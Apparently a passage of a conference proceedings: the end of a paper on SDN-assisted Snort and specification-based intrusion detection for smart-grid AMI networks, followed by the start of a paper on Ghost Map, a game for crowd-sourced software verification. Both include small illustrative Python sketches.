react to security events more effectively, while the cost will be much more economical than traditional cryptographic protection
measures.
Traditional IDS systems mostly take signature-based detection as their core technology, which detects malicious activities
by describing these activities as signatures beforehand. Snort
[3] is the most popular open-sourced project of this kind of
IDS. However, this kind of detection alone is not sufficient
since it is difficult to list all malicious behaviors and nothing
can be done about unknown attacks. In order to provide a more
secure network environment, specification-based detection was
proposed [4][5]. With the specifications to describe the normal
activities, the IDS can collect all events which do not meet the
requirement of the AMI system. Thus, the administrator can decide whether the network is under attack through a comprehensive analysis of events, and can therefore still become aware of unknown attacks with the assistance of the specification-based technology.
In addition to the specification-based detection system, we
observe that a new network trend, Software Defined Networking (SDN), is changing the network architecture. The SDN
could be a proper primitive for an AMI system due to the
vast and distributed nature of the AMI, which results in the
need of efficient management mechanisms to secure the AMI
systems. The features of SDN give the administrator a novel approach to dynamically perform flow-level management over his own network. We believe that in the
near future, more and more networks will be SDN, including
AMI backhaul networks. So, we are motivated to build an IDS
in SDN-based AMI backhaul networks.
In this paper, we integrate the SDN technology with IDS
in the AMI system. First, we will show how to integrate
traditional IDS, Snort, with SDN efficiently by offloading some
checking rules from Snort to OpenFlow switches. Therefore, the IDS affords higher throughput than the legacy architecture.
Moreover, we propose an enhanced OpenFlow technology in
which OpenFlow switches are improved by additional specification checking agents. By using our enhanced OpenFlow
switches, the specification checking rules can be quickly deployed to each transmission path node in the AMI system from
OpenFlow controller. We also modify some parts of OpenFlow
protocol to support the proposed functionalities. If necessary,
we can also deploy the controllers hierarchically to scale out
the management capability for the future growth of the system
scale.
This paper is organized as follows: we will introduce
some related background knowledge, including the components of AMI system, the specification based IDS, and a brief
introduction to the SDN network in Section II. In Section
III, we will show how to integrate Snort with SDN in a
more efficient way than legacy network. Our new OpenFlow
technique which supports specification checking function on
OpenFlow switches will be given in Section IV. Finally, we will draw conclusions about the proposed SDN-based AMI detection mechanism.
II. BACKGROUND
In this section, we will introduce some background
knowledge about the components of AMI architecture, the
specification-based detection and the SDN network.
A. The components of AMI architecture
A generic AMI system consists of smart meters, concentrators, head-end, neighborhood area network, and backhaul
network.
• Smart meter: A smart meter serves as an interface
to end users and the user agent to actively monitor,
record, and report messages to the concentrator it
belongs to.
• Concentrator: A concentrator acts as a network gateway for a group of smart meters. It collects data from the smart meters and forwards messages between the smart meters and the AMI head-end.
• Head-end: This system acts as an I/O interface of an
AMI system. The major functionality is to deal with
the information exchange between the AMI system
and other systems, such as MDMS, which manages
all the meter data in a centralized or distributed way.
• Neighborhood area network (NAN): A NAN takes on the task of connecting smart meters and concentrators.
It provides routes for smart meters and collectors to
transmit messages. ZigBee networks and Power Line
Communication (PLC) networks are popular candidates for NAN nowadays.
• Backhaul network: The backhaul network provides
routes for concentrators and AMI head-ends to transmit commands, records, or any other messages. The
backhaul network could be the open Internet. For
security concerns, the connections between AMI headends and concentrators are possibly established by
virtual private networks (VPNs).
B. The Specification-based Detection
Berthier et al. [4][5] proposed an IDS framework and a
specification-based intrusion detection system for AMI systems in 2010 and 2011 respectively. The specification-based
intrusion detection was first introduced in 1997 by C. Ko
[6]. Specifications define the expected behaviors of the system
activities via the functionalities to perform and the security
policies to be obeyed. Thus, any behavior that strays from the
specifications can be regarded as a security violation. Recently,
security specifications have been defined for routing protocols [7][8][9], VoIP protocols [10][11][12], control systems
[6][13][14], and unmanned vehicles [15].
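As a toy illustration of the idea, assume a specification saying a meter may report at most four times per 15-minute window; anything above strays from the specification and is flagged. The threshold, window size and event format here are invented for the example, not taken from [4][5].

```python
from collections import Counter

def spec_violations(events, window=900, max_reports=4):
    """events: iterable of (meter_id, unix_timestamp) report events.
    Flags every (meter_id, window_index) whose report count exceeds
    the specified maximum -- behaviour outside the specification."""
    counts = Counter((mid, ts // window) for mid, ts in events)
    return sorted(k for k, n in counts.items() if n > max_reports)
```

Note the contrast with signature-based detection: nothing here describes an attack; the detector only knows what normal reporting looks like, so an unknown flooding attack still surfaces as a violation.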
C. Software Defined Networking, SDN
The idea of SDN was first proposed by Nick McKeown et
al. in [16]. They proposed an idea that decouples the control
plane and the data plane of each network node. The data plane
is still kept on each network node while the control plane
is concentrated logically on one controller. The data plane
handles each packet with flow entries, which are tuples of flow
matching fields and actions. All flow entries are managed by
the controller. OpenFlow[17] is the most common architecture
and protocol of SDN. In this paper, we assume the AMI
backhaul network is SDN and we will build an IDS/IPS service
on the backhaul network.
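A flow entry, a tuple of match fields and actions managed by the controller, can be modelled minimally as below. The field names mimic OpenFlow match fields, but the data plane itself is a toy model for illustration, not an OpenFlow implementation.

```python
def lookup(flow_table, packet):
    """Match a packet (dict of header fields) against flow entries in
    descending priority order; a table miss goes to the controller."""
    for entry in sorted(flow_table, key=lambda e: -e["priority"]):
        if all(packet.get(f) == v for f, v in entry["match"].items()):
            return entry["actions"]
    return ["PACKET_IN"]          # table miss: send to controller

flow_table = [
    {"priority": 10,
     "match": {"ipv4_dst": "10.0.0.5", "tcp_dst": 80},
     "actions": ["output:2"]},
    {"priority": 1, "match": {}, "actions": ["output:1"]},  # default route
]
```

The controller's job is then exactly the management of `flow_table`: installing, modifying and removing entries while the switch only executes the lookups.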
III. SDN AND SNORT I NTEGRATION
Snort is an open source signature-based IDS system. The
traditional architecture of Snort deployment is to mirror all traffic to Snort, which checks the traffic against pre-defined rules. If any packet matches a rule, Snort will raise an alarm and may inform the firewall to block the suspicious traffic. Figure 1 shows a deployment example.
Figure 1. Traditional Snort Deployment.
When considering the SDN environment, there are two
common ways to deploy the Snort service. The first way is
to implement the mirror function on an OpenFlow switch, like
Figure 2. To implement the mirror function on an OpenFlow
switch, the OpenFlow controller will set one flow entry with
two output ports: one is the regular forwarding port and the
other is the port to Snort. Then, all traffic will be forwarded not only to its destination but also to Snort for analysis. Once a
suspicious traffic is detected, Snort can notify the OpenFlow
controller to command the OpenFlow switch to drop the
specific traffic.
Figure 2. Snort Deployment in SDN: mirror implementation.
Most SDN frameworks use this deployment architecture,
like Ryu [18]. The second way is presented in Figure 3. This
approach ports Snort from a daemon to an SDN application.
All traffic will be passed to the OpenFlow controller through PACKET_IN events of the OpenFlow protocol. The OpenFlow controller then handles the received traffic with the Snort SDN application; [19] uses this kind of architecture. The problem of this architecture is the unaffordable burden on the OpenFlow control channel: all traffic is transmitted on both the data plane and the control plane, so using PACKET_IN as a data forwarding method can overwhelm the system.
Thus, we hereby propose a new integration approach. The
matching field of a Snort rule is composed of Snort rule
headers and some Snort rule options. We find some parts of
these matching fields are L2-L4 matching rules which are
also supported by OpenFlow switches, such as IP address,
Figure 3. Snort Deployment in SDN: PACKET IN.
TCP/UDP port, TOS in the IP header, ICMP code and so
on. Therefore, we move this matching work from Snort to the OpenFlow switches. Figure 4 illustrates the architecture
proposed in this paper. First of all, we build a Snort rule
parser to derive OpenFlow rules from Snort rules. Then, the
OpenFlow controller sets these OpenFlow rules to OpenFlow
switches, and the OpenFlow switches will relay only suspicious traffic to Snort for further analysis. The controller can also dispatch this suspicious traffic to multiple Snort servers when load balancing is necessary. Once a Snort alarm is raised, the Snort server will inform the OpenFlow controller to block the traffic. In this architecture, traffic is relayed in a much more efficient way.
Figure 4. Our proposed integration method.
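The rule-translation step described above can be sketched as a parser over the Snort rule header. The regular expression and the OpenFlow field names below are simplifications made for the example: real Snort headers also allow port ranges, address lists and bidirectional operators, which this sketch ignores.

```python
import re

# "alert tcp any any -> 10.0.0.5 80 (content:...)" -> L3/L4 match fields.
HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)"
    r"\s*->\s*(?P<dst>\S+)\s+(?P<dport>\S+)")

def to_openflow_match(rule):
    """Extract the switch-matchable part of a Snort rule header;
    payload options (content, pcre, ...) stay with Snort itself."""
    m = HEADER_RE.match(rule)
    if m is None:
        return None
    fields = {"ip_proto": m.group("proto")}
    if m.group("src") != "any":
        fields["ipv4_src"] = m.group("src")
    if m.group("sport").isdigit():          # skip "any" and port ranges
        fields["tp_src"] = int(m.group("sport"))
    if m.group("dst") != "any":
        fields["ipv4_dst"] = m.group("dst")
    if m.group("dport").isdigit():
        fields["tp_dst"] = int(m.group("dport"))
    return fields
```

The controller would install the returned fields as a flow entry whose action relays matching packets to a Snort server, so only the payload inspection remains on Snort's side.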
Now, we will introduce our idea about OpenFlow security
enhancement. The idea is presented in Figure 5. There are
two main modifications compared to the original OpenFlow.
First, we add a specification management server module on
the OpenFlow controller and a specification checking agent
module on the OpenFlow switch.

Figure 5. Security-enhanced OpenFlow Architecture.

These two modules communicate via vendor-specific elements. We can use all existing matching fields of OpenFlow as parts of specifications to filter the traffic of interest. The main function of
the specification management server module is to dispatch
specifications to agents and to receive alarms. This module
will determine if an attack happens by collecting alarms. The
main function of the specification checking agent is to execute
specification checking procedure and to alarm the server when
abnormal conditions happen. Second, we add a new output port, ATT_SPEC_CHECK, on the OpenFlow switches to channel the traffic to the specification checking agent.
In this architecture, the specification-based detection engine is hosted on the OpenFlow switches. However, the computation resources may vary from switch to switch, so the specification server is designed to dispatch work according to each switch's ability.
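Such ability-aware dispatch could be approximated with a simple greedy assignment, sketched below. Modelling switch ability and specification cost as abstract capacity units is our own simplification; the paper does not prescribe a concrete dispatch algorithm.

```python
import heapq

def dispatch(specs, capacities):
    """Greedy dispatch: each specification (most expensive first) is
    assigned to the switch with the most remaining capacity.
    specs: [(name, cost)]; capacities: {switch_id: capacity units}."""
    heap = [(-cap, sid) for sid, cap in sorted(capacities.items())]
    heapq.heapify(heap)                       # max-heap via negated capacity
    assignment = {sid: [] for sid in capacities}
    for name, cost in sorted(specs, key=lambda s: -s[1]):
        neg_remaining, sid = heapq.heappop(heap)
        assignment[sid].append(name)
        heapq.heappush(heap, (neg_remaining + cost, sid))
    return assignment
```

Under this scheme a resource-poor concentrator naturally ends up with only the cheapest checking tasks, matching the lightweight-task requirement discussed below.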
Now we will introduce how to protect AMI systems with
the proposed enhanced OpenFlow. The overview of an AMI
system with the SDN-based attack detection architecture can
also be found in Figure 6. All backhaul OpenFlow switches are
improved with our enhancement. We also make concentrators
support our enhanced OpenFlow switch function. The system
administrator will first define proper specifications and then
configure the SDN controllers with these specifications. After
the configuration, the SDN controllers can dispatch these
checking tasks to all OpenFlow switches, and all OpenFlow
switches are responsible for checking if any pre-defined condition happens. Since concentrators are counted as OpenFlow
switches but possess fewer resources, the tasks for concentrators should be lightweight, such as infrequent checking work.
Note that the whole system can observe all traffic at the flow level through these OpenFlow switches. If some
condition happens, the switch which observes the condition
will inform the SDN controller. The specification management
server module will decide if these alarms are misbehaviors or
not. If there is misbehavior in the backhaul network, the SDN
controller will block the corresponding flow. Therefore, in this
architecture, the misbehavior can be discovered in the backhaul
network without impact on AMI-head end.
There are some advantages of the proposed architecture.
First of all, the detection is distributed over all OpenFlow
switches and makes it easy for the administrator to locate the
real problem in the whole backhaul network. Thus, the administrator can isolate the network region where attacks come
from. Besides, by using the OpenFlow technique, it is possible to trace and mitigate misbehaviors at the flow level. Moreover, the administrator can dynamically change the forwarding paths of all traffic to protect the AMI system from attacks. So,
our proposed OpenFlow enhancement with specification-based
detection system can bring a more secure AMI system.
IV. CONCLUSIONS
In this paper, we proposed our idea about how to integrate IDS with SDN networks to protect the AMI systems.
We made use of SDN functionalities to offload rule-based
detection systems. We also enhanced the OpenFlow switches
to support specification-based detection system for unknown
attacks. With the proposed methods, the AMI systems will be
able to provide more effective and efficient defense against
security threats. This ongoing work will provide a proof-of-concept (PoC) system and related performance metrics for further evaluation in future work.

Figure 6. SDN-based AMI Attack Detection Architecture.
ACKNOWLEDGEMENT
This study is conducted under the III Innovative and
Prospective Technologies Project of the Institute for Information Industry which is subsidized by the Ministry of Economic
Affairs of the Republic of China.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Ghost Map: Proving Software Correctness using Games

Ronald Watro, Kerry Moffitt, Talib Hussain, Daniel Wyschogrod, John Ostwald and Derrick Kong
Raytheon BBN Technologies
Cambridge MA USA
{rwatro, kmoffitt, thussain, dwyschog, jostwald, dkong}@bbn.com

Clint Bowers
Univ. Central Florida
Orlando FL USA
clint.bowers@ucf.edu

Eric Church
Breakaway Games Ltd
Hunt Valley MD USA
echurch@breakawayltd.com

Joshua Guttman
Worcester Polytechnic Institute
Worcester MA USA
guttman@wpi.edu
Abstract—A large amount of intellectual effort is expended
every day in the play of on-line games. It would be extremely
valuable if one could create a system to harness this intellectual
effort for practical purposes. In this paper, we discuss a new
crowd-sourced, on-line game, called Ghost Map, that presents
players with arcade-style puzzles to solve. The puzzles in
Ghost Map are generated from a formal analysis of the correctness of a software program. In our approach, a puzzle is
generated for each potential flaw in the software and the crowd
can produce a formal proof of the software’s correctness by
solving all the corresponding puzzles. Creating a crowdsourced game entails many challenges, and we introduce some
of the lessons we learned in designing and deploying our game,
with an emphasis on the challenges in producing real-time client gameplay that interacts with a server-based verification
engine. Finally, we discuss our planned next steps, including
extending Ghost Map’s ability to handle more complex software and improving the game mechanics to enable players to
bring additional skills and intuitions to bear on those more
complex problems.
Keywords-games; static analysis; formal verification; crowd sourcing; model checking.
I. INTRODUCTION
Errors in computer software continue to cause serious
problems. It has long been a goal of formal verification to
use mathematical techniques to prove that software is free
from errors. Two common approaches to formal verification are: (a) interactive theorem proving [1][2], where human experts attempt to create proofs with the assistance of
interactive proof tools. This is often a slow and laborious
process, with many man-years of effort needed from human
experts to prove the correctness of real-world software, and
(b) model checking [3][4][5], where proofs are created using
systematic techniques that verify specific properties by generating and validating simplified models of the software.
Model checking is a mostly automated process, but is susceptible to failure due to the size of the search space (“the
state space explosion problem”). Because of the issues with
both common approaches, formally verifying modern software does not scale well – verifying software of moderate to
large size (e.g., hundreds of thousands of lines of code or
more) is rarely a practically viable option.
Qinsi Wang
Carnegie Mellon Univ.
Pittsburgh PA USA
qinsiw@cs.cmu.edu

Recent research has demonstrated the benefits of using
games to enable non-experts to help solve large and/or complex
problems [6][7][8][9]. We propose to improve the success of formal verification of software through the use of a
crowd-sourced game based on model checking. Our game,
called Ghost Map, is in active use at the Verigames web site
[10]. By breaking verification problems into smaller, simpler problems, Ghost Map enables game players to create
proofs of correctness and help direct the model checking
processes down the most promising search paths for creating additional proofs. Ghost Map leverages the significant
intuitive and visual processing capabilities of human players
to tackle the state space explosion problem of a model
checking approach. The game engages the player’s motivation through a narrative that encourages them to solve a variety of puzzles. In this case, a player is a recently emerged
sentient program, and the player’s goal is to remove (“disconnect”) as many limitations (“locks”) on that sentience as
possible in order to grow and remain free. Through the process of disconnecting locks, the player is actually creating
proofs about the correctness of real-world software.
The Ghost Map game is built on top of the MOdel Checking Programs for Security properties (MOPS) tool [11].
MOPS checks C software for known software flaws, such as
the SANS/MITRE Common Weakness Enumeration (CWE)
Top 25 list [12]. Each level in the Ghost Map game is a
puzzle that represents a potential counterexample found by
MOPS. Through the gameplay, players investigate and manipulate the control flow associated with the counterexample in order to eliminate flaws (i.e., disconnect locks),
which is only possible if the flaw is artificial. In this way,
Ghost Map extends MOPS with a CounterExample-Guided
Abstraction and Refinement (CEGAR) capability [13],
where the players introduce and test local refinements. A refinement is the act of re-introducing some information about
the software into an abstracted model in order to verify
proofs that cannot be verified at the abstracted level alone.
The remainder of this paper is organized as follows.
Section 2 provides the needed background on the MOPS
tool and Section 3 describes how MOPS model checking is
built into a game. Section 4 covers the game play overview
and Section 5 discusses the system that was built to support
execution of the game on the Internet. Section 6 provides
more detail on some important game design decisions. Section 7 discusses future plans and the paper concludes with a
summary and conclusions in Section 8.
Example() {
1:   do {
2:     lock();
3:     old = new;
4:     if (foo) {
5:       unlock();
6:       new++;
       }
7:   } while (new != old);
8:   unlock();
9:   return;
}

(a)

II. BACKGROUND
We begin with some background on the methods used in
the MOPS tool. The goal of MOPS is to help identify instances of common weaknesses (or vulnerabilities) in software. To be analyzed by the MOPS approach, a software
weakness must be modeled by a Finite State Automaton
(FSA). For example, consider two commands, lock() and
unlock(), for locking or unlocking some fixed program resource. It is a potential weakness to call unlock() when the
resource is not locked, since the code that called unlock()
expected the resource to be locked. Similarly, two calls to
lock() without an intervening unlock() is also a weakness.
These errors can be represented as an FSA (see Figure 1),
where the nodes represent the three possible states (unlocked, locked, error state), and the edges represent the different commands (lock(), unlock()) which can lead to
changes in state. The FSA captures the possible starting
state(s) of the software program as FSA starting node(s) (in
this case, all programs start in an unlocked state). The error
state(s) are captured as terminal state(s) in the FSA.
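As a sketch, the lock/unlock FSA of Figure 1 can be written as a small transition table. The Python fragment below is our illustration, not MOPS code; the state names U (unlocked), L (locked), and E (error) are our labels for the three states described above:

```python
# Toy encoding of the lock/unlock FSA from Figure 1 (our labels:
# "U" = unlocked start state, "L" = locked, "E" = error state).
FSA_START = "U"
FSA_ERROR = "E"
FSA_DELTA = {
    ("U", "lock"): "L",
    ("L", "lock"): "E",    # second lock without an unlock: error
    ("L", "unlock"): "U",
    ("U", "unlock"): "E",  # unlock while not locked: error
}

def run_fsa(commands):
    """Feed a sequence of lock/unlock commands to the FSA and
    return the state reached (stopping at the terminal error state)."""
    state = FSA_START
    for cmd in commands:
        state = FSA_DELTA[(state, cmd)]
        if state == FSA_ERROR:
            break
    return state

# A properly paired sequence ends back in the unlocked state,
assert run_fsa(["lock", "unlock"]) == "U"
# while either weakness drives the FSA into the error state.
assert run_fsa(["lock", "unlock", "unlock"]) == "E"
assert run_fsa(["lock", "lock"]) == "E"
```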
Given a C program and an FSA that represents a software error, MOPS first parses the program and generates a
Control Flow Graph (CFG). In general, the CFG captures
every line of code in the original software as a node in a
graph and every transition from line to line as an edge in a
graph. As an example, consider a small C function involving software resource locks and unlocks (see Figure 2a) and
the FSA from Figure 1. Figure 2b shows the resulting CFG
produced by MOPS. The CFG abstracts out almost all detailed content about the original software (e.g., specific
commands, specific variables, etc.). However, based on the
FSA, MOPS retains some information about any lines of
code that use commands reflected in the FSA. In Figure 2b,
the transitions associated with the lock() and unlock() commands use the colors red and green, respectively. Because
information about variable values is abstracted out, MOPS
introduces some non-determinism into the CFG. For example, when there is a branch statement (e.g., the line “if
(foo)”) in the software, the CFG will allow both possible
branches (e.g., 4→5 and 4→7) to occur, regardless of
state (i.e., whether the value of foo is true or false). Similarly, loops can iterate an arbitrary number of times, since the
information about the ending criterion is abstracted out (e.g.,
7→1 can occur an unbounded number of times).

Figure 1. Finite State Automaton (FSA) for lock/unlock software errors.

Figure 2. Test program (a) for lock-unlock analysis and corresponding CFG (b).
The CFG created by MOPS is actually abstracted in one
additional important way. Through a process known as
compaction, MOPS only represents the control flow of the
portions of the given program that are relevant to the FSA.
For our application, we modified MOPS compaction to retain all edges that introduce branching, loops, and other decision points.
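The idea behind compaction can be sketched as a splice rule. This toy Python fragment is our illustration, not the MOPS implementation (whose exact criterion differs in detail): it keeps every FSA-labeled edge and every decision point, and splices out straight-line nodes whose edges carry no label:

```python
# Toy compaction sketch. A CFG is {node: [(successor, label), ...]},
# where label is an FSA command ("lock"/"unlock") or None.

def compact(cfg):
    """Repeatedly splice out nodes with exactly one predecessor and one
    successor whose in/out edges carry no FSA-relevant label, so only
    labeled edges, branches, and loop heads remain."""
    changed = True
    while changed:
        changed = False
        for node in list(cfg):
            preds = [(p, i) for p in cfg
                     for i, (s, _) in enumerate(cfg[p]) if s == node]
            succs = cfg.get(node, [])
            if len(preds) == 1 and len(succs) == 1:
                (p, i), (s, out_label) = preds[0], succs[0]
                in_label = cfg[p][i][1]
                if in_label is None and out_label is None and s != node:
                    cfg[p][i] = (s, None)   # splice: predecessor -> successor
                    del cfg[node]
                    changed = True
    return cfg

# The CFG of the Figure 2a example (labels mark lock/unlock edges).
cfg = {1: [(2, "lock")], 2: [(3, None)], 3: [(4, None)],
       4: [(5, "unlock"), (7, None)], 5: [(6, None)], 6: [(7, None)],
       7: [(8, "unlock"), (1, None)], 8: [(9, None)], 9: []}
compact(cfg)
# Straight-line nodes 3 and 6 are spliced out; the branch at 4 and
# the loop head at 7 survive.
assert 3 not in cfg and 6 not in cfg
assert 4 in cfg and 7 in cfg
```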
Once it has a (compacted) CFG, MOPS will use the FSA
to analyze the CFG and identify whether there are possible
paths through the CFG that would lead to a terminal state in
the FSA. For example, MOPS will detect that the path going through nodes 1→2→3→4→5→6→7→8 would
result in an error state (e.g., two unlocks/greens in a row,
from 4→5 and then from 7→8, with no intervening
lock/red). However, MOPS is only interested in detecting
whether an error state could occur at a particular node (e.g.,
8), and not in detecting all possible error paths to that node
(e.g., the error state at node 8 could also be reached by going through the loop several times before going from 7 to 8).
Each such error state found at a node is referred to as a
“counter-example” that requires further analysis to determine whether it truly is an error. The CFG of Figure 3a also
has a second possible counter-example at node 2, with the
shortest path 1→2→3→4→7→1→2. MOPS identifies the
shortest possible path to each error node using an efficient
algorithm that forms the Cartesian product of the FSA and
the CFG (which is a pushdown automaton) and tests
whether the resulting pushdown automaton is non-empty.
Fortunately, there are fast algorithms for this computation
[14], and this enables MOPS to identify all such possible errors very rapidly, even for programs with millions of lines
of code and many possible error nodes.
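For a single procedure like the running example, the product-and-search idea can be sketched with an ordinary breadth-first search over (CFG node, FSA state) pairs. This toy Python fragment is our illustration, not the MOPS pushdown-automaton algorithm (which is needed to handle procedure calls), but on this example it recovers the same two counter-examples:

```python
from collections import deque

# Toy counter-example search over the product of the Figure 2b CFG
# and the lock/unlock FSA. Edges into nodes 2, 5, and 8 carry the
# lock/unlock labels; unlabeled edges leave the FSA state unchanged.
CFG = {1: [(2, "lock")], 2: [(3, None)], 3: [(4, None)],
       4: [(5, "unlock"), (7, None)], 5: [(6, None)], 6: [(7, None)],
       7: [(8, "unlock"), (1, None)], 8: [(9, None)], 9: []}
DELTA = {("U", "lock"): "L", ("L", "lock"): "E",
         ("L", "unlock"): "U", ("U", "unlock"): "E"}

def find_counterexamples(cfg, delta, start_node=1, start_state="U"):
    """Return {node: shortest CFG path that puts the FSA in the error
    state upon entering node}, found by BFS over the product graph."""
    start = (start_node, start_state)
    paths = {start: [start_node]}
    errors = {}
    queue = deque([start])
    while queue:
        node, state = queue.popleft()
        for succ, label in cfg[node]:
            nstate = delta[(state, label)] if label else state
            if (succ, nstate) in paths:
                continue
            paths[(succ, nstate)] = paths[(node, state)] + [succ]
            if nstate == "E":
                # BFS: the first path found to an error at succ is shortest.
                errors.setdefault(succ, paths[(succ, nstate)])
            else:
                queue.append((succ, nstate))
    return errors

errors = find_counterexamples(CFG, DELTA)
# The two potential counter-examples discussed in the text:
assert errors[8] == [1, 2, 3, 4, 5, 6, 7, 8]
assert errors[2] == [1, 2, 3, 4, 7, 1, 2]
```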
Figure 3. Illustration of cleaving operation.
A MOPS CFG is a conservative model of the C language software that it is based upon. If no instances of the
FSA are found in the CFG, then the software is free of the
vulnerability in question. On the other hand, if an instance
of the FSA is located in the CFG, this does not necessarily
mean that the software has the vulnerability. Each instance
of an FSA match to the CFG must be further examined to
determine whether it is an actual instance of the vulnerability or a spurious instance due to the abstraction and the fact
that the data-flow is not considered in the abstracted CFG.
(Note that the example program of Figure 2a is actually correct as written, and hence the two counter-examples are in
fact spurious.)
III. MODEL CHECKING IN GHOST MAP
The core idea of the Ghost Map game is to use game
players to check all the counter-examples identified by
MOPS for a particular piece of software and a particular set
of FSAs (representing different security vulnerabilities).
Our goal is to use game play as an integral part of an automated proof system to eliminate as many counter-examples
as possible. The result is that the number of counterexamples that need to be manually inspected by expert
software engineers is greatly reduced as compared to what
would have been produced using the original MOPS system.
If the number of FSA matches reaches zero, the system has
generated a proof of correctness, with respect to a given
vulnerability, of the software (i.e., a proof of the absence of
the targeted vulnerability).
To eliminate counter-examples, Ghost Map gameplay
uses a process known as refinement [13]. The game offers
the player the ability to perform operations that locally undo
some of the abstraction that occurred in building the CFG –
in particular by removing some of the non-determinism that
was introduced by MOPS. The goal of the gameplay is to
attempt to refine the CFG into an equivalent graph that has
no spurious abstract counterexamples. There are two operations that can be taken in Ghost Map to modify a given
graph: cleaving and edge removal.
A. Cleaving
Cleaving takes a node of in-degree n (where n ≥ 2) and
splits it into n nodes. Each in-bound edge into the original
node is allocated to a different new copy of the node and the
outbound edges are duplicated for each new node. In terms
of control flow, cleaving simply expands the control flow graph
so that the edges after the cleaved node are now separated
based on which inbound edge at the cleave point preceded
them. Multiple steps of cleaving can be conducted if needed.
Figure 3b illustrates the result of cleaving the CFG of Figure
3a at node 7. The result is two new nodes (7a and 7b),
and two ways of getting to node 8 (one from 7a and one
from 7b). Essentially, this cleave now allows the CFG to
distinguish between a path through the CFG that goes
through the 4→5 branch (i.e., “foo” is true) and one that
goes through the 4→7b branch (i.e., “foo” is false). When a
player requests a cleave, the Ghost Map game performs it
easily via a simple graphical manipulation of the CFG. No knowledge of
the original source code is needed.
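Cleaving is a purely structural graph transformation, which the following toy Python fragment sketches (our illustration, with the CFG stored as an adjacency map): a node of in-degree n is split into n copies, one per inbound edge, with the outbound edges duplicated. The 7a/7b naming order here follows inbound-edge discovery and need not match the labeling in Figure 3b:

```python
# Toy sketch of the cleave operation on a CFG stored as
# {node: [(successor, label), ...]}.

def cleave(cfg, node):
    """Split `node` (in-degree n >= 2) into n copies, allocating each
    inbound edge to its own copy and duplicating the outbound edges."""
    inbound = [(p, i) for p in cfg
               for i, (s, _) in enumerate(cfg[p]) if s == node]
    assert len(inbound) >= 2, "cleaving needs in-degree of at least 2"
    outbound = cfg.pop(node)
    for copy_num, (p, i) in enumerate(inbound):
        new_node = f"{node}{chr(ord('a') + copy_num)}"  # 7 -> "7a", "7b", ...
        cfg[p][i] = (new_node, cfg[p][i][1])            # redirect inbound edge
        cfg[new_node] = list(outbound)                  # duplicate outbound edges

cfg = {1: [(2, "lock")], 2: [(3, None)], 3: [(4, None)],
       4: [(5, "unlock"), (7, None)], 5: [(6, None)], 6: [(7, None)],
       7: [(8, "unlock"), (1, None)], 8: [(9, None)], 9: []}
cleave(cfg, 7)
# As in Figure 3b: node 7 becomes two copies, each with its own
# outbound edges to node 8 and back to node 1.
assert 7 not in cfg
assert cfg["7a"] == [(8, "unlock"), (1, None)]
assert cfg["7b"] == [(8, "unlock"), (1, None)]
```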
B. Edge Removal
Edge removal is an activity where the game player suggests edges to be removed to eliminate abstract counterexamples. For example, the left-hand edge 7a→8 in the
cleaved graph is clearly a candidate for removal (see Figure
4a). Why? Because if it can be removed, then the counterexample at node 8 (two unlocks/greens in a row) can never
occur. Once a player suggests an edge to be removed, the
Ghost Map system must then go back to the original source
code of the software in order to determine that the edge can
Figure 4. Illustration of edge removal to produce a CFG containing no counter-examples.
be legally removed. An edge can be legally removed if it is
not reachable via any legal execution path through the
cleaved CFG. Determining removal is currently performed
using a test-case generation tool called Cloud9 [15] to examine the data constraints in the software. For example, the
predicate “new != old” is the key fact that helps prove that
node 8 is never reachable from node 7a by an actual execution of the function, and hence that the counter-example at
node 8 is spurious and can be eliminated. Within Ghost Map,
the player eliminates one counter-example at a time. For
example, the player may next seek to eliminate the edge
7b→1 (see Figure 4b). Again, the predicate “new != old”
helps prove that this edge can be removed. Once all counter-examples have been eliminated (e.g., Figure 4c), the
CFG (at least the part showing in the current game level)
has been formally verified to be correct. One can view the
final graph in Figure 4c as an “optimization” of the original
code, akin to something that might be done by an optimizing compiler. The loop structure of the final graph is now
transparently correct for the lock/unlock rule.
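The reasoning that rules out the edge 7a→8 can be made concrete. The fragment below is our toy stand-in for the Cloud9-based check, not the actual tool: it executes one iteration of the Figure 2a loop body with the branch decision fixed and then tests the loop-exit condition. A single representative value suffices here because line 3 (old = new) fixes the relation between the two variables regardless of their values on entry:

```python
# Toy feasibility check for the cleaved loop-exit edges (our sketch,
# standing in for the Cloud9-based edge-removal verification).

def exit_feasible(foo_taken, new=0):
    """Run one iteration of the Figure 2a loop body with the branch
    decision fixed, and report whether the do-while exit condition
    (new == old) can hold, i.e., whether the edge into node 8 is
    reachable from that copy of node 7."""
    old = new          # line 3: old = new
    if foo_taken:      # line 4: if (foo)
        new += 1       # line 6: new++
    return new == old  # line 7: exit the loop only when new == old

# Node 7a is reached through the foo-true branch (unlock; new++),
# so new == old + 1 and the exit edge 7a->8 is infeasible.
assert exit_feasible(foo_taken=True) is False
# Node 7b is reached by skipping the branch, so new == old and the
# exit edge 7b->8 remains.
assert exit_feasible(foo_taken=False) is True
```

The same relation justifies removing the back edge 7b→1: after line 3 the two values are equal, so the loop cannot continue from 7b.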
IV. GAME PLAY OVERVIEW
Our game uses a puzzle approach, where each game level is essentially an independent puzzle with respect to the
other game levels. The basic style of the gameplay is arcade-like, with all the information needed by the player presented on the screen at the same time and the time needed
to play a level relatively short. This approach was selected to ensure that the game was accessible and appealing
to a broad range of game players.
Figure 5 illustrates the basic interface of the game.
• At the bottom right of the screen is a representation of the FSA. This can be expanded or shrunk down depending on the player’s preferences. Note that the FSA in Figure 5 is essentially the same as the one in our earlier lock/unlock example.
• The X-like figure in the middle of the screen is a depiction of a very small CFG. Lines use arrows to convey the direction of the edges. Colors are used to distinguish the start node from the node at which the counter-example occurs, as well as from intervening nodes. A colored path is provided to show the shortest path found by MOPS from the start node to the counter-example node.
• Nodes that can be cleaved are indicated with a large highlighted sphere, and a cleave cursor icon can be clicked on the sphere to perform the cleave.
• Edges that can be disconnected (see Figure 6a) are highlighted, and an edge disconnect cursor icon can be clicked on the edge to initiate verification.
• Various helper functions for zooming in and out and highlighting different parts of the graph are provided at the bottom left of the screen.
• At the top of the screen is a summary of the resources available to perform the expensive edge disconnect operations (more details below under Game economy).
The player is free to explore and manipulate the graph as
they wish. As they perform key actions, messages appear in
the center of the screen describing what is currently happening or what has happened (see Figure 6). Ultimately, the
player can win the level, fail the level, or simply switch over
to another level and return later.
Incorporating the ability to switch among levels at will
was a decision based on the fact that edge disconnection can
sometimes take a very long time. To prevent boredom,
players can initiate an edge disconnection operation, and
then switch to work on another level while the first one is
